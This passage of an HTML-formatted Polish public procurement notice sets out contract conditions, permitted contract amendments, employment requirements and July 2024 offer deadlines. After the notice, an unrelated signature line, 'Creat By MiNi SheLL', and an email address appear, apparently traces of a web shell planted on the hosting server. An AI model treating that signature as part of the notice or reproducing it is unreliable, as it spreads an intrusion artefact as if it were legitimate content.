upełnomocnionego.<br/><br/>6.	Zobowiązanie innego podmiotu zał. nr 5 do SWZ - jeżeli dotyczy. <br/>7.	Oświadczenie - oferta wspólna zał. Nr 6 do SWZ – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmiany zawartej umowy, w zakresie:<br/>a)	zmiany podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy, po uprzed-niej akceptacji Zamawiającego;<br/>b)	zmiany osób realizujących przedmiot umowy, w przypadku zdarzeń losowych niezależnych od Wy-konawcy, na uzasadnione wystąpienie Wykonawcy i po akceptacji Zamawiającego, w tym w szcze-gólności osoby kierującej prowadzonymi pracami;<br/>c)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy Zamawiający dopuszcza zmiany w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;<br/>d)	w przypadku wystąpienia siły wyższej Zamawiający dopuszcza zmiany w zakresie umowy do oko-liczności będących skutkiem siły wyższej;<br/>e)	wystąpią rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie i załącznikach, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowa-nie umowy i załączników w celu jednoznacznej interpretacji ich zapisów przez Strony;<br/>f)	zmiany terminów realizacji poszczególnych obowiązków Wykonawcy wynikających Harmonogramu Rzeczowo – Finansowego w sytuacji, gdy w toku realizacji umowy ujawnią się nieznane Stronom na dzień zawierania umowy okoliczności uniemożliwiające dochowanie terminów wskazanych w w/w. harmonogramie (w szczególności przedłużająca się procedura odbioru, konieczność przygotowania informacji/dokumentów niezbędnych do realizacji przedmiotu umowy);<br/>g)	zmiany sposobu dokumentowania wykonania umowy, zmiany sposobu koordynacji realizacji umowy przez przedstawicieli Stron – w sytuacji gdy pojawią się nieprzewidziane wcześniej okoliczności ma-jące wpływ na sposób realizacji umowy;<br/>h)	zmiana terminu przewidzianego na wykonanie przedmiotu umowy w przypadku niedostępności na rynku materiałów lub urządzeń wskazanych przez Wykonawcę w złożonej ofercie, <br/>i)	zmiany dotyczące przedmiotu umowy w zakresie dostarczanych urządzeń, w przypadku zaprzestania produkcji przez producenta oferowanego sprzętu (urządzenia, elementu), jeśli Wykonawca pomimo dołożenia należytej staranności nie mógł uzyskać takiej informacji, o ile Wykonawca wykaże, iż doło-żył należytej staranności, aby uzyskać od producenta informację odnośnie kontynuowania lub zaprze-stania produkcji oferowanego sprzętu (urządzenia, elementu) i zaoferuje w zamian urządzenia, o nie niższych parametrach technicznych i funkcjonalności, kompatybilny z urządzeniami zaoferowanymi w ofercie.<br/>2.	W przypadku wystąpienia okoliczności, o których mowa powyżej, termin wykonania przedmiotu umo-wy może ulec wydłużeniu o określoną liczbę dni, odpowiadającą czasowi trwania przeszkody wykona-nia umowy.<br/>3.	Zmiana postanowień umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej w postaci aneksu.<br/>4.	Zamawiający, po uprzednim wyrażeniu zgody na piśmie, dopuszcza możliwość wprowadzenia zmiany materiałów przedstawionych w ofercie pod warunkiem, że zmiany te będą korzystne dla Zamawiające-go. Będą to, przykładowo, okoliczności:<br/>a)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wy-konanego przedmiotu umowy;<br/>b)	powodujące poprawienie parametrów technicznych;<br/>c)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.<br/>5.	Zmiany, o których mowa w ust. 3, muszą być każdorazowo zatwierdzone przez przedstawiciela Zama-wiającego.<br/>6.	Zmiany, o których mowa w ust. 3 nie spowodują zmiany wynagrodzenia za wykonanie przedmiotu umowy, o którym mowa w § 3 ust. 1. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/przytezni</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com